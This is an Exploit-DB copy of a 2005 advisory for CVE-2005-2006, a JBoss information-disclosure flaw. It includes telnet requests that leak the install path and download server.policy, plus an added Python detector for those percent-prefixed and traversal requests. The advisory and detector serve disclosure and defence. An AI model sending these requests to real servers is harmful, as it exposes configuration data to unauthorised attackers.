- 18 Dec 2022
- EDB-ID: 25842
- EDB Verified: Passed
- Author: MARC SCHOENEFELD
- Vulnerability type: REMOTE
- Platform: MULTIPLE
- CVE: cve-2005-2006
- Publication date: 2005-06-17
Code:
source: https://www.securityfocus.com/bid/13985/info
JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to insufficient sanitization of user-supplied request data.
Information that attackers can harvest by leveraging this issue may aid in further attacks against the affected service.
Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0
Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff verweigert)
Content-Type: text/html
Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0
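The advisory shows the request shape that triggers the disclosure: a request to the JBoss WebServer class-loading service (TCP 8083 in a default install) whose resource name begins with `%` instead of a class path. The following added example, which is not part of the original advisory or of JBoss itself, is a small detector a defender could run over captured request lines to that port. It assumes a constructed set of sample request lines (labelled as such in the code) and treats anything other than a plain `.class` lookup, including the `%`-prefixed form quoted above and `..` traversal in the resource name, as a finding worth alerting on.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample request lines, as they might be seen in a capture of
# traffic to the JBoss WebServer (RMI dynamic class-loading service,
# TCP 8083 in a default install). They are not taken from the page's own
# logs; the first two reproduce the request shapes the advisory quotes.
SAMPLE_REQUESTS = [
    "GET %. HTTP/1.0",
    "GET %server.policy HTTP/1.0",
    "GET /org/jboss/test/Foo.class HTTP/1.0",
    "GET %../jboss-service.xml HTTP/1.0",
    "GET /org/jboss/test/Bar.class HTTP/1.1",
]

# Minimal HTTP request-line grammar: METHOD SP PATH SP HTTP/x.y
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/\d\.\d$")


@dataclass
class Finding:
    request: str
    reason: str


def classify_request(line: str) -> Optional[Finding]:
    """Return a Finding for a request the class-loading service should not be
    serving, or None for a request that looks like ordinary class loading.

    The only legitimate traffic on this port is the RMI client fetching
    .class files by path, so anything else is treated as suspicious.
    """
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return Finding(line, "malformed request line")
    path = m.group("path")
    # The '%' prefix is the resource-lookup form abused in CVE-2005-2006.
    if path.startswith("%"):
        return Finding(line, "percent-prefixed resource request (CVE-2005-2006 pattern)")
    # Parent-directory components have no place in a class-file lookup.
    if ".." in path.split("/"):
        return Finding(line, "directory traversal in resource name")
    # The service exists to serve compiled classes, nothing else.
    if not path.endswith(".class"):
        return Finding(line, "request for a non-.class resource")
    return None


def scan_requests(lines: List[str]) -> List[Finding]:
    """Run classify_request over a batch of request lines, keeping only hits."""
    findings = []
    for line in lines:
        f = classify_request(line)
        if f is not None:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f.reason}: {f.request}")
```

Run against the constructed samples, the detector flags the two advisory-style requests and the traversal attempt while passing the two ordinary class lookups. Because the class-loading port has a single narrow purpose, an allow-list on the request shape, as above, is easier to keep correct than a block-list of known bad prefixes, and a network-level restriction of port 8083 to the hosts that actually need RMI class loading removes the exposure entirely.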
- Source: www.exploit-db.com